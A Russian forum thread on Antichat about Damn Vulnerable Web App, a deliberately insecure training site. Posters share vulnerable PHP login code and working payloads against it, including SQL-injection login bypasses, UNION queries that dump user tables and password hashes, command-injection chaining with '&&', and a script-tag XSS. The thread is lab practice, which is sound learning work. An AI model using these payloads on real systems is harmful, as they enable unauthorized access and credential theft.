Форум АНТИЧАТ - Damn Vulnerable Web App. Тренировочная площадка.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Damn Vulnerable Web App. Тренировочная площадка. (https://forum.antichat.xyz/showthread.php?t=130070)

Damn Vulnerable Web App. Тренировочная площадка.

Это веб-приложение - тренировочная площадка для испытания и совершенствования своих навыков в поиске и использовании веб-уязвимостей.
Имеет три уровня безопасности(сложности).
Поддерживает следующие виды атак:
*SQL Injection
*XSS (Cross Site Scripting)
*LFI (Local File Inclusion)
*RFI (Remote File Inclusion)
*Command Execution
*Upload Script
*Login Brute Force
*и многие другие..

Для использования необходим вебсервер + база данных MySQL
Видео с наиподробнейшим описанием и инструкцией можно посмотреть здесь: http://www.youtube.com/watch?v=GzIj07jt8rM
Подробности на оф.сайте: http://www.ethicalhack3r.co.uk/
Скачать dvwa v1.0.4: dvwa v1.0.4: http://sourceforge.net/projects/dvwa

Если не ошибаюсь это поддельный вебсервер для поиска бага. Вот готовые тест сайты для пентеста и проверки своих навыков:
SPI Dynamics (live) - http://zero.webappsecurity.com/
Cenzic (live) - http://crackme.cenzic.com/
Watchfire (live) - http://demo.testfire.net/
Acunetix (live) - http://testphp.acunetix.com/ http://testasp.acunetix.com http://testaspnet.acunetix.com
WebMaven / Buggy Bank - http://www.mavensecurity.com/webmaven
Foundstone SASS tools - http://www.foundstone.com/us/resources-free-tools.asp
Updated HackmeBank - http://www.o2-ounceopen.com/technica...hacmebank.html
OWASP WebGoat - http://www.owasp.org/index.php/OWASP_WebGoat_Project
OWASP SiteGenerator - http://www.owasp.org/index.php/Owasp_SiteGenerator
Stanford SecuriBench - http://suif.stanford.edu/~livshits/securibench/
SecuriBench Micro - http://suif.stanford.edu/~livshits/work/securibench-micro/

ТС, ты бы еще сюда ссылки на игровые образы CTF выложил :) пусть народ потренируется

для тех кто пытался проходить...
1) уровень "Low"->Brute force

Код:

$user=$_GET['username'];

$pass=$_GET['password'];              

$pass = md5($pass);

$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";

$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );

Обошел так:
логин: admin'#
пароль: можно оставить пустым, так как уязвим только логин.
Вопрос: почему не сработало admin'--+ (в качестве тренировочной площадки - денвер)

уровень "Medium"->Brute force

Код:

$user = $_GET['username'];              

$user = mysql_real_escape_string($user);

$pass=$_GET['password'];

$pass = mysql_real_escape_string($pass);

$pass = md5($pass);

$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";

$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );

Опять же уязвимость в поле логин.
Вопрос: реально ли обойти mysql_real_escape_string()? или здесь токо брутфорс поможет?

It's easy
В SQL-Inj на medium:

Код:

-1 UNION SELECT 1,2 /*

1 и 2 подставляем как хотим, а вместо строк узаем HEX

Цитата:

Сообщение от mr.celt

уровень "Medium"->Brute force

Код:

$user = $_GET['username'];              

$user = mysql_real_escape_string($user);

$pass=$_GET['password'];

$pass = mysql_real_escape_string($pass);

$pass = md5($pass);

$qry="SELECT * FROM `users` WHERE user='$user' AND password='$pass';";

$result=mysql_query($qry) or die('<pre>' . mysql_error() . '</pre>' );

Опять же уязвимость в поле логин.
Вопрос: реально ли обойти mysql_real_escape_string()? или здесь токо брутфорс поможет?

Функция mysql_real_escape_string() экранирует кавычки, поэтому выполнить обход авторизации нельзя.

Цитата:

Сообщение от Nik(rus)

It's easy
В SQL-Inj на medium:

Код:

-1 UNION SELECT 1,2 /*

1 и 2 подставляем как хотим, а вместо строк узаем HEX

Че-то не понял тебя, ты этим хочешь обойти авторизацию? В post-инъекции?

кому интересно - существует ещё Damn Vulnerable Linux :)
damnvulnerablelinux.org

Цитата:

Сообщение от mr.celt

Че-то не понял тебя, ты этим хочешь обойти авторизацию? В post-инъекции?

Он просто не совсем полностью выложил скуль:

Цитата:

-1 UNION SELECT password,2 FROM USERS--

И получаем всех юзверов.

В Command Execution на Лов лвл, можно юзать дополнительно команды, разделяя их как в Линуксе так и в Винде амперсандами, пример:

Цитата:

ya.ru && cd C:/ && DIR

На выходе получаем пинг, переход в диск Ц, и список файлов и папок. Ну а дальше от фантазии зависит.

ЗЫ Доступна версия 1.0.6, давайте не спим делимся опытом, кто что нашел интересного, я только начал.

Вот как я ломал :)

1.Low SQL-Inj

Код:

-1' UNION SELECT concat_ws(0x3A,user(),version(),database()),'ololo sql :D'/*

Узнаем инфу, дальше:

Код:

-1' UNION SELECT table_name,'table' FROM information_schema.tables WHERE table_schema='dvwa'/*

Тут узнали таблицы, дальше:

Код:

-1' UNION SELECT column_name,'column' FROM information_schema.columns WHERE table_schema='dvwa'/*

Так узнаем колонки, и наконец:

Код:

-1' UNION SELECT concat_ws(0x3A,user_id,first_name,last_name,user,password,avatar),concat('info about ',first_name,' aka ',user) FROM users/*

Юзверята :D
2. Low Brute
Тут 2 пути:
1) Через скулю (это вооонтам наверху) достаем хэши, брутим на hashcracking,gdataonline, md5.rednoise etc, благо пароли слабые
2)

Код:

Логин: admin' /*

Пасс: ололо админ школота

Ну и угадайте что происходит :)
3. Low Command Execution

Код:

127.0.0.1 && dir C:\

Наблюдаем пинг 127.0.0.1 и листинг диска C:\
4. Low Upload

Код:

No comments aka тупо льем

5. Low File Inclusion

Код:

http://site/fi_content.php

=> инклудит файлы из корня

Тут видно, что есть связка - LFI и Upload Vuln, берем сканер по хеадерам и сканим известные диры aka up, upload, uploads и находим uploads с прямым листингом :)
6. XSS

Код:

</pre><script>alert('xss :D')</script><pre>some HaCkEr

Видим тупую XSS
7. BONUS:
в медиум SQL-Inj:

Код:

-1 UNION SELECT concat_ws(0x3A,user(),version(),database()),2/*

Вот такие пироги :)

С последующими уровнями становится больше и больше фильтров, но как говорится на каждый замок - своя отмычка